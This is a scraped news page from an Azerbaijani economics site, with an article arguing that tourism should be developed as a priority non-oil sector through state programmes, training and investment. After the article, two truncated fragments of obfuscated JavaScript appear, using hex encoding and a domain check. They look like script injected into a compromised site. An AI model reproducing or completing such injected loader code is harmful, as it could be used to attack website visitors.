Exact matches only
Search in title
Search in content
Search in posts
Search in pages
Filter by Categories
Ailə təsrrüfatı
Банк и страхование
Международная экономика
Bilik Iqtisadiyyatı
diskurs.az radio unec
Dünya İqtisadi Forumu
Fiskal Siyasət
İnforqrafika
İnnovasiya
ISE Economic Talks
Made in Azerbaijan
Макроэкономический анализ
Финансовые рынки
Marketinq
Milli iqtisadiyyat
Müsahibə
Нефть
Транспорт
Транспорт
Qender
Предпринимательство
Sənaye
Turizm
Налоги и пошлины
Домохозяйства
Экономическое образование
USD 1.7000, EUR 1.9649, TRY 0.2990, RUB 0.0260, CNY 0.2456, GEL 0.6355, GBP 2.2393, IRR 0.0040, JPY 1.5143, XAU 2077.4085, XAG 24.8617, XPT 1425.0420, XPD 1836.6205
(Azərbaycan) Turizm sənayesi iqtisadiyyatın prioritet sahəsidir
Вторник Май 17th, 2016
0
eco

Извините, этот техт доступен только в “Азербайджанский”. For the sake of viewer convenience, the content is shown below in the alternative language. You may click the link to switch the active language.

Baş verən iqtisadi proseslər bir daha onu göstərir ki ,hər bir perspektiv inkişafını düşünən ölkə və xüsusilə  neft ölkəsi qeyri-neft sektorunun inkişafını diqqətdə saxlamalı və dayanıqlı inkişaf üçün zəmin yaratmalıdır.Belə ki , bu nöqteyi nəzərdən qeyri-neft sektorunun strukturuna nəzər yetirməyimiz məqsədəuyğun olardı.

Məlum olduğu kimi ,kənd təsərrüfatı,nəqliyyat ,yungül və yeyinti sənayesi,rabitə,kimya sənayesi,turizm sənayesi və digər sahələr qeyri-neft sektoru sahələridir. Göstərilən bu sahələrin hər biri neftdən asılılığın azaldılmasında mühüm əhəmiyyətə malikdir. Burada Qeyri-neft sektoru kimi turizm sənayesini xüsusi qeyd etmək olar.turizm 1

Halhazırda ölkəmizdə turizmin inkişaf etdirilməsi üçün xeyli işlər görülür.Bunun üçün ölkə rəhbərimiz cənab Prezident tərəfindən müxtəlif fərmanlar və sərəncamlar verilimişdir.

Azərbaycanın turizm potensialı olduqca yüksəkdir. Ölkəmizin həm təbii-coğrafi, həm də müasir dünyada tutduğu mövqe Azərbaycanı turistlər üçün maraqlı bir məkana çevirib. Amma Tanrı tərəfindən Azərbaycana bəxş olunan bu gözəllikləri, bu nemətləri turizm məhsuluna çevirmək lazımdır. Dövlətimiz turizmin inkişafı istiqamətində vacib addımlar atmaqdadır. Bu baxımdan, turizm sektorunun inkişaf etdirilməsi üçün mütəxəssislərin olması da vacib şərtlərdən biridir. Hazırda turizm mütəxəssislərinin yetişdirilməsinə ehtiyac, tələbat mövcuddur. Bu ehtiyacı dəyərləndirərək ölkə rəhbərliyi müstəqil Azərbaycanda Turizm İnstitutunun yaradılmasına qərar verdi. Dövlət rəhbərliyinin qərarı əsasında 2006-cı ildə Azərbaycan Turizm İnstitutu açıldı. Turizmin özü də əhəmiyyətli dərəcədə insanlarla işləmək məsələsi olduğu üçün burada kadr amili də çox önəmlidir. Çünki burada xidmət, işin təşkili məsələləri və s. vacib məqamlar mövcuddur.

. Turizm sənayesinin müasir idarəetmə modeli sadə və çevik olmalıdır. Onun meyarları aşağıdakı kimidir. – turizm sənayesində idarəetmə fəaliyyətinin effektivliyinin təmin edilməsi; – turizm sənayesi müəssisələrinin idarəetmə hesabına rəqabətədavamlılığın təmin edilməsi.

turizm 2Inkişaf etməkdə olan ölkələrin turizmin inkişafına artan marağı Azərbaycan Respublikasının simasında da özünü büruzə verir. Turizm sferasının maddi-texniki bazasını, sosial infrastruktur sistemini dünya standartları səviyyəsində təşkil etmək üçün bu sahənin maliyyə təminatı getdikcə yaxşılaşdırılır. Turizmin investisiya təminatının yaxşılaşdırılması dövlət vəsaiti, sahibkarların kapitalı, birgə turist müəssisələrinin yaradılması və respublikaya cəlb edilən xarici investisiyalardan istifadə əsasında həyata keçirilir. Azərbaycan Respublikası Prezidentinin sərəncamı ilə 2010-2014-cü illərdə turizmin inkişafına dair “Dövlət Proqramı ” təsdiq edilmişdir.

Proqramın təsdiq edilməsində məqsəd, Azərbaycanda yüksək iqtisadi, sosial, ekoloji tələblərə cavab verən müasir turizm xidməti sahələrinin formalaşdırılması, turizm sahəsini ölkə iqtisadiyyatının əsas inkişaf dayaqlarından birinə çevrilməsinin təmin edilməsi, qeyri-neft sektorunda turizmin gəlir gətirən sahə kimi inkişaf etdirilməsi, bu sahədə yüksək keyfiyyətli xidmət səviyyəsinin yaradılması və davamlı inkişafın təmin edilməsidir. Buna görə də respublikada bu sahədə elə çevik siyasət yeridilir ki, bu da istehlak dövriyyəsinə yeni resursların cəlb edilməsinə imkan verir. Digər tərəfdən isə, xarici investisiyaların cəlb edilməsi və iqtisadi dövriyyədə istifadə olunması müddətləri biri-birilə elə razılaşdırılmalıdır ki, cəlb olunmuş vəsait gözlənilən səmərəni versin. Turizmin xarici investisiya təminatına regionların inkişaf səviyyəsini, onlarda infrastrukturların vəziyyətini nəzərə almaqla yanaşmaq lazımdır.

turizm 3

Əksər inkişaf etmiş ölkələrdə bu problemin həllində xarici və birgə sahibkarlığın imkanlarından da geniş istifadə olunur ki, bu da turist mühitinin yaxşılaşdırılması amili kimi çıxış edir. Hesablamalar göstərir ki, getmə turizmin inkişafına yönəldilən daxili və xarici investisiyaların hesabına turizmi resurslardan birinə çevirmək üçün böyük imkanlar vardır. ÜTT-nin məlumatlarına əsasən, bir turistin səyahət, yaxud istirahət etməsi üçün lazım olan orta maliyyə xərcləri əsasında ildə 1,5 mln. turist qəbul edən Azərbaycan Respublikasında 4,5 mlrd. dollara yaxın ümumi gəlir əldə etmək mümkündür. Hesab edirik ki, Azərbaycanın malik olduğu rekreasiya ehtiyatları turizmin formalarından səmərəli istifadə etməklə dövlət büdcəsinin gəlirlərinin formalaşmasının mühüm mənbələrinə çevrilə bilər. Bunun üçün ekoturizm və aqroturizmin investisiya təminatı əsaslı surətdə gücləndirilməlidir.

Azərbaycan Respublikasında Şəki-Zaqatala, Quba–Xaçmaz, Gəncə-Qazax regionlarında aqroturizm, Abşeron, Quba-Xaçmaz, Lənkəran–Astara zonalarında isə ekoturizmin inkişafı üçün böyük ehtiyat mənbəələri vardır. Əsas vəzifə ondan ibarətdir ki, bu ehtiyatları təsərrüfatçılıq dövriyyəsinə daxil etməklə onlardan səmərəli istifadə olunsun. Qeyd olunan problemin həlli yalnız dövlət vəsaiti hesabına deyil, digər maliyyə mənbələrindən də istifadəyə əsaslanmalıdır. Turizm fəaliyyətində investisiya təminatını yaxşılaşdırmaq üçün sahibkarlığın müxtəlif formalarından istifadə edilməsi iqtisadi cəhətdən məqsədəuyğundur.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «diskurs.az»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «diskurs.az»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e


Оставьте ответ

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Перейти к верхней панели